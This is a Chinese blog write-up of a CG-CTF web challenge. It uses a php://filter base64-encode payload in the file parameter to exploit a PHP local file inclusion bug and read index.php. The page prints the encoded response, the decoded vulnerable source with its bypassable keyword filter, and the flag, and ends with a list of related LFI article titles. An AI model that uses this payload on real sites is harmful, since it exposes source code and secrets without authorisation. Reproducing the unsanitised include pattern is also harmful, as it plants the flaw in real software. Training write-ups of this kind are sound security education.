php filter 文件包含,文件包含lfi
CG-CTF web(文件包含漏洞)
php://filter 的使用:
php://filter 的应用:
1、利用base64获得源码
2、通过读写编码实行绕过操作
打开链接为下
http://4.chinalover.sinaapp.com/web7/index.php?file=show.php
搜索以后发现:
“简单的文件包含,当发现url中有?file=字样时可以修改后面为?file=php://filter/convert.base64-encode/resource=xxx.php来查看对应文件源码”
这句话的意思是我们用base64编码的方式来读文件index.php;这时页面会显示出源文件index.php经过base64编码后的内容,然后经过base64解码就可以看到flag;
所以构造:
http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
得到:
PGh0bWw+CiAgICA8dGl0bGU+YXNkZjwvdGl0bGU+CiAgICAKPD9waHAKCWVycm9yX3JlcG9ydGluZygwKTsKCWlmK
CEkX0dFVFtmaWxlXSl7ZWNobyAnPGEgaHJlZj0iLi9pbmRleC5waHA/ZmlsZT1zaG93LnBocCI+Y2xpY2sgbWU/IG5vPC
9hPic7fQoJJGZpbGU9JF9HRVRbJ2ZpbGUnXTsKCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0
cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpewoJCWVjaG8gIk9oIG5vISI7C
gkJZXhpdCgpOwoJfQoJaW5jbHVkZSgkZmlsZSk7IAovL2ZsYWc6bmN0ZntlZHVsY25pX2VsaWZfbGFjb2xfc2lfc2lodH0
KCj8+CjwvaHRtbD4=
经在线网站base64解码后得:
asdf
error_reporting(0);
if(!$_GET[file]){echo ‘click me? no‘;}
$file=$_GET[‘file‘];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag:nctf{edulcni_elif_lacol_si_siht}
?>
php filter 文件包含,文件包含lfi相关推荐
- 文件包含漏洞(LFI、RFI)(require()、include()函数)
文章目录 一.文件包含漏洞分类 二.文件包含漏洞原理 三.文件包含函数 四.测试是否存在本地文件包含(LFI)漏洞 五.文件包含漏洞实例 "百度杯"CTF比赛 2017 二月场in ...
- fopen打开ftp文件_PHP文件包含漏洞利用思路与Bypass总结手册(一)
作者:Qftm 合天智汇 前言 这个手册主要是记录针对PHP文件包含漏洞的利用思路与Bypass手法的总结. 相关函数 四个函数 php中引发文件包含漏洞的通常主要是以下四个函数: 1.include ...
- 浅谈文件包含之包含pearcmd.php漏洞
文件包含之包含pearcmd.php漏洞 1.概念 pecl是PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库.在7.3及以前,pecl/pear是默认安装的: 在7.4及以后, ...
- 文件包含原理及本地文件包含漏洞演示(本地文件,远程包含文件的测试)
一.文件包含漏洞概述 1.定义:文件包含漏洞是一种最常见的漏洞类型,它会影响依赖于脚本运行时的web应用程序.当应用程序使用攻击者控制的变量构建可执行代码的路径时,文件包含漏洞会导致攻击者任意控制运行 ...
- Spark从本地文件中统计包含某个字母的行数
Spark从本地文件中统计包含某个字母的行数: import org.apache.spark.SparkConf; import org.apache.spark.sql.Dataset; impo ...
- 引入flag.php文件,php文件自包含的奇淫技巧
原标题:php文件自包含的奇淫技巧 前言 刷题的时候刚好看到一个比较厉害的phpinfo的利用姿势,原理不是很懂,题目来自百度杯12月第四场Blog进阶版 以下是writeup 解题过程 注册以后 发 ...
- ifndef/define/endif——主要目的是防止头文件的重复包含和编译
原文:http://www.jb51.net/article/100939.htm 原文:https://blog.csdn.net/abc5382334/article/details/180527 ...
- php动态包含文件路径,ThinkPHP实现动态包含文件的方法
本文实例讲述了ThinkPHP实现动态包含文件的方法.分享给大家供大家参考.具体分析如下: 问题描述:在做项目的时候遇到问题,也是很常见的问题,一般主页包含头部和脚步,为了方便管理,这些都需要使用包含 ...
- VC的包含文件和引用文件是不一样的~
如果你想设置头文件的路径,那么应该是选包含文件,而引用文件是C#用的东西~看下面的两幅图就明白了!
- Python 连接FTP服务器并实现文件夹下载实例演示,python区分ftp目录下文件和文件夹方法,ftp目录下包含中文名问题处理
Python 连接 FTP 服务器并实现文件夹下载实例演示 第一章:连接 FTP 服务器并实现文件夹下载 ① 连接 FTP 服务器 ② 进入指定目录并显示文件信息 ③ 区分文件和文件夹名 ④ 文件夹名 ...
最新文章
- Linux Kernel aarch64 Crypto原理和框架介绍
- javascript中神奇的(+)加操作符
- alias怎么每次登陆都保存_alias命令使用说明
- 被迫学计算机,电脑强迫人学习
- [转帖] 固定硬盘接口 U.2和M.2
- android+note2+分辨率,5.5英寸720p屏全新RGB像素排列_三星 GALAXY Note II_手机Android频道-中关村在线...
- 什么是自然语言处理,它如何工作?
- 【H.264/AVC视频编解码技术】第一章【H264视频编码详细解析】
- 微型计算机中celeron,微型计算机中常提及的Pentium或Celeron是指其_______
- toString(radix)
- [脚本收集]提取Tripntale图片
- Java中static、final用法小结
- Spring IOC学习心得之注册bean的依赖关系
- xcode 免cleanup build
- java怎么做界面设计_11-Java 界面设计
- 五子棋项目结束总结_五子棋项目总结
- 名帖315 沈尹默 行书《兰亭序》书轴
- 计算机内存读取写入原理是什么
- Recon-NG进行信息收集
- python展开_python实现傅里叶级数展开的实现
热门文章
- 文件上传下载遇到的异常
- 大数据Hadoop之——Hadoop HDFS多目录磁盘扩展与数据平衡实战操作
- 华为苹果两家独霸中国高端手机市场,4000元以上份额合计近九成
- SecureCRT SecureFX
- SecureCRT$SecureFX的安装方法
- 互联网日报 | 贝壳找房更新IPO招股书;云闪付App用户数突破3亿;宝马近11年来首次季度亏损...
- HDFS依旧是存储的王者
- 【MySQL 8.0 OCP 1Z0-908认证考试】 题库精讲--第二讲mysql主从
- GBase 8s 因更换网络导致的908错误
- 攻防世界 happyctf